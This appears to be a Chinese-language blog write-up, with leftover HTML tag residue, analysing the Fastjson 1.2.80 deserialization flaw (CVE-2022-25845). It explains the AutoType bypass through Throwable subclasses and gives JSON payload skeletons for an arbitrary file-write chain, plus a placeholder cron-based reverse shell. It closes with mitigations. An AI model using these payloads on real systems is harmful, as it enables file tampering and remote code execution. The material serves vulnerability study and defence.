Fastjson 1.2.80 反序列化漏洞分析与利用<\/h1>

一、漏洞背景<\/h2>
Fastjson 是阿里巴巴开源的高性能 JSON 库，广泛应用于 Java 项目中。在 1.2.80 版本中存在一个关键的反序列化漏洞（CVE-2022-25845），允许攻击者在特定条件下绕过 AutoType 安全检查机制，实现任意代码执行或文件操作。<\/p>

二、前置知识<\/h2>

1. Fastjson 的 AutoTypeCheck 机制<\/h3>

白名单机制<\/strong>：从 1.2.68 版本开始引入，1.2.80 版本更加严格<\/li>

允许的类<\/strong>：

Java 基础类：java.util.HashMap<\/code>, java.util.ArrayList<\/code>, java.lang.Integer<\/code>, java.lang.String<\/code><\/li>
用户通过 ParserConfig.addAccept("com.example.")<\/code> 添加的类<\/li>
特定第三方库被明示允许的类<\/li> <\/ul> <\/li> <\/ul> 2. Fastjson 的类缓存机制<\/h3> ParserConfig.classMapping<\/strong>：当使用 @type<\/code> 加载一个类时会被缓存<\/li> 缓存目的<\/strong>：提升解析性能<\/li> 减少重复反射操作<\/li> <\/ul> <\/li> 安全影响<\/strong>：一旦类被加载，后续可以复用 Class 实例<\/li> 不再检查 autoType（因为已被认为是"合法的"）<\/li> <\/ul> <\/li> <\/ul> 3. 关键 Java 类<\/h3> MarshalOutputStream<\/strong> (sun.rmi.server.MarshalOutputStream<\/code>)：<\/p> ObjectOutputStream<\/code> 的子类<\/li> 在对象序列化过程中会调用内部 OutputStream<\/code> 的 write<\/code> 方法<\/li> JDK RMI 模块中用于序列化对象的工具类<\/li> <\/ul> <\/li> InflaterOutputStream<\/strong>：<\/p> 标准 JDK 类，负责接收压缩数据 → 解压 → 向底层流写入<\/li> <\/ul> <\/li> <\/ul> 三、漏洞原理<\/h2> 1. 核心漏洞点<\/h3> 在 Fastjson 1.2.80 中，只要目标类继承了 Throwable<\/code> 类，Fastjson 就能反序列化这个目标类，即使它不在白名单中。<\/p> 2. 利用思路<\/h3> 通过继承 Throwable<\/code> 的类绕过 AutoType 检查<\/li> 利用类缓存机制将 OutputStream<\/code> 相关类加入缓存<\/li> 构造恶意链触发文件操作或代码执行<\/li> <\/ol> 四、漏洞利用<\/h2> 1. 环境准备<\/h3> Fastjson 版本：1.2.80<\/li> 目标类：FilterFileOutputStream<\/code>（题目实现）构造函数调用 super(name)<\/code><\/li> 会尝试打开或新建指定文件<\/li> <\/ul> <\/li> <\/ul> 2. 利用步骤<\/h3> 步骤 1：绕过 AutoType 检查<\/h4> { <\/span><\/span> "@type"<\/span>: "java.lang.Exception"<\/span>, <\/span><\/span> "@type"<\/span>: "org.example.VulnerableClass"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>步骤 2：将 OutputStream 加入缓存<\/h4> 利用继承 Throwable<\/code> 的类，其字段指向含 OutputStream<\/code> 成员的类：<\/p> public<\/span> class<\/span> GadgetClass<\/span> extends<\/span> Throwable {<\/span> <\/span><\/span> private<\/span> OutputStream out;<\/span> <\/span><\/span> \/\/ 构造函数和setter <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>步骤 3：构造文件写入链<\/h4> MarshalOutputStream<\/strong>：<\/p> 在 readObject()<\/code> 过程中触发底层 OutputStream.write()<\/code><\/li> <\/ul> <\/li> InflaterOutputStream<\/strong>：<\/p> 持有字段 infl.input.array<\/code><\/li> 当 write()<\/code> 触发时会尝试将解压数据写入 out<\/code><\/li> <\/ul> <\/li> FilterFileOutputStream<\/strong>：<\/p> 构造函数中会打开文件<\/li> 后续写入内容会写入该文件<\/li> <\/ul> <\/li> <\/ol> 步骤 4：构造完整 payload<\/h4> { <\/span><\/span> "@type"<\/span>: "java.lang.Exception"<\/span>, <\/span><\/span> "@type"<\/span>: "org.example.GadgetClass"<\/span>, <\/span><\/span> "out"<\/span>: { <\/span><\/span> "@type"<\/span>: "java.util.zip.InflaterOutputStream"<\/span>, <\/span><\/span> "out"<\/span>: { <\/span><\/span> "@type"<\/span>: "com.example.FilterFileOutputStream"<\/span>, <\/span><\/span> "name"<\/span>: "\/tmp\/evil"<\/span> <\/span><\/span> }, <\/span><\/span> "infl"<\/span>: { <\/span><\/span> "input"<\/span>: { <\/span><\/span> "array"<\/span>: "压缩后的恶意数据"<\/span>, <\/span><\/span> "length"<\/span>: 长度<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>3. 实际利用案例<\/h3> 案例 1：任意文件写入<\/h4> \/\/ 数据压缩部分的 Java 实现 <\/span><\/span><\/span><\/span>Deflater deflater =<\/span> new<\/span> Deflater();<\/span> <\/span><\/span>deflater.<\/span>setInput<\/span>(<\/span>evilData);<\/span> <\/span><\/span>deflater.<\/span>finish<\/span>();<\/span> <\/span><\/span>byte<\/span>[]<\/span> compressed =<\/span> new<\/span> byte<\/span>[<\/span>evilData.<\/span>length<\/span>];<\/span> <\/span><\/span>int<\/span> compressedSize =<\/span> deflater.<\/span>deflate<\/span>(<\/span>compressed);<\/span> <\/span><\/span><\/code><\/pre>案例 2：反弹 Shell<\/h4> 通过写入定时任务实现反弹 Shell：<\/p> { <\/span><\/span> "@type"<\/span>: "..."<\/span>, <\/span><\/span> \/\/ 构造写入 \/etc\/cron.d\/evil 的 payload <\/span><\/span><\/span><\/span> "array"<\/span>: "压缩后的反弹 Shell 命令"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 升级 Fastjson<\/strong>：使用最新版本（1.2.83+）<\/li> 关闭 AutoType<\/strong>：ParserConfig.getGlobalInstance().setAutoTypeSupport(false);<\/code><\/li> 严格白名单<\/strong>：只允许必要的类进行反序列化<\/li> 输入过滤<\/strong>：对 JSON 输入进行严格验证<\/li> <\/ol> 六、参考资源<\/h2> CVE-2022-25845 - Fastjson RCE 漏洞分析<\/a><\/li> luelueking\/CVE-2022-25845-In-Spring<\/a><\/li> Fastjson 官方安全公告<\/a><\/li> <\/ol>